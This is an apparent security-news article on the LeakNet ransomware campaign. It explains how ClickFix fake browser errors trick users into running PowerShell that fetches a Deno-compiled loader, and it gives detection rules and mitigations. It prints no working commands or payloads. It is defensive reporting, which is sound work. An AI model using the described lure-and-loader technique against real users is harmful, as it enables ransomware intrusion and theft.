LeakNet Ransomware: Stealthy Exploitation via Deno and ClickFix
- [01] Immediate impact: LeakNet ransomware targets corporate users via social engineering to deploy stealthy loaders that bypass standard detection tools.
- [02] Affected systems: Windows environments are at risk when users are lured into executing malicious PowerShell commands through browser-based error overlays.
- [03] Remediation: Restrict PowerShell execution via Group Policy and monitor for unauthorized standalone binaries generated by the Deno runtime compiler.
Overview of LeakNet Ransomware Tactics
The LeakNet Ransomware group has significantly refined its TTP by integrating the ClickFix social engineering technique with a sophisticated loader based on the Deno runtime. According to BleepingComputer, this transition marks a shift toward leveraging less common execution environments to evade EDR and other signature-based security controls. By utilizing Deno—a secure-by-default runtime for JavaScript and TypeScript—the attackers can package malicious scripts into standalone executables that appear legitimate to many heuristic scanners.
This campaign primarily targets corporate employees, using deceptive browser overlays to trick users into compromising their own systems. The use of a relatively niche runtime environment complicates the Deno runtime malware analysis process for many SOC teams, as existing detection rules often focus on more common engines like Node.js or the native Windows Script Host.
Technical Analysis: ClickFix to Deno Loader
The attack chain begins with Phishing or compromised websites that host the ClickFix overlay. This technique presents the user with a fake browser error, such as a missing root certificate or a connectivity failure, and provides a “Fix” button. When clicked, the button copies a malicious PowerShell command to the user’s clipboard and instructs them to paste and run it in a terminal or the Windows ‘Run’ dialog.
The ClickFix Initial Access Vector
The success of ClickFix relies on the psychological pressure of a technical failure. Once the user executes the PowerShell script, it initiates a series of actions:
- Environment Validation: The script checks for the presence of specific security tools or sandbox environments.
- Payload Retrieval: It reaches out to a C2 server to download the Deno-based loader.
- Persistence: The loader may establish persistence through registry modifications or scheduled tasks.
This method bypasses traditional email filters because the initial interaction occurs entirely within the browser DOM and relies on manual user execution rather than a direct file download that might be flagged by a gateway.
Deno Runtime Malware Analysis: A New Stealth Frontier
LeakNet’s choice of Deno is tactical. Deno allows developers to compile scripts into single, self-contained executable files using the deno compile command. For an attacker, this means they can bundle the entire runtime environment with their malicious script. Because Deno is not natively installed on most corporate workstations, its presence and activity may not be covered by standard MITRE ATT&CK detection patterns designed for PowerShell or .NET-based threats.
Analysts have observed the loader performing information theft and environment reconnaissance before deploying the final ransomware payload. The loader manages network communications via HTTPS, often mimicking legitimate API traffic to blend in with standard web activity. To effectively counter these threats, security teams must understand how to detect LeakNet ransomware ClickFix attempts by monitoring for specific clipboard-to-shell execution patterns.
Detection and Remediation Strategies
Defending against LeakNet requires a multi-layered approach that addresses both the social engineering aspect and the technical execution phase. Organizations should prioritize visibility into shell activity and user-space executions.
## LeakNet Ransomware Mitigation Steps
To reduce the risk of infection, SOC teams should implement the following controls:
- PowerShell Constrained Language Mode: Enforce Constrained Language Mode to limit the functionality of scripts executed by end-users, which can break the functionality of the ClickFix payload.
- Endpoint Monitoring: Configure SIEM alerts for any instance where a browser process (e.g., chrome.exe, msedge.exe) is the parent process of
powershell.exeorcmd.exewhen accompanied by unusual command-line arguments. - Binary Whitelisting: Use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unrecognized standalone binaries in
%APPDATA%or%TEMP%directories, where Deno-compiled loaders are typically dropped. - User Training: Educate staff on the risks of “copy-paste” troubleshooting steps. Genuine browser updates or certificate fixes never require a user to manually run PowerShell commands provided by a website.
By tracking the IoC associated with LeakNet infrastructure and monitoring for the unique footprint of the Deno compiler, defenders can proactively identify these stealthy intrusions before they escalate to full-scale data encryption.
Advertisement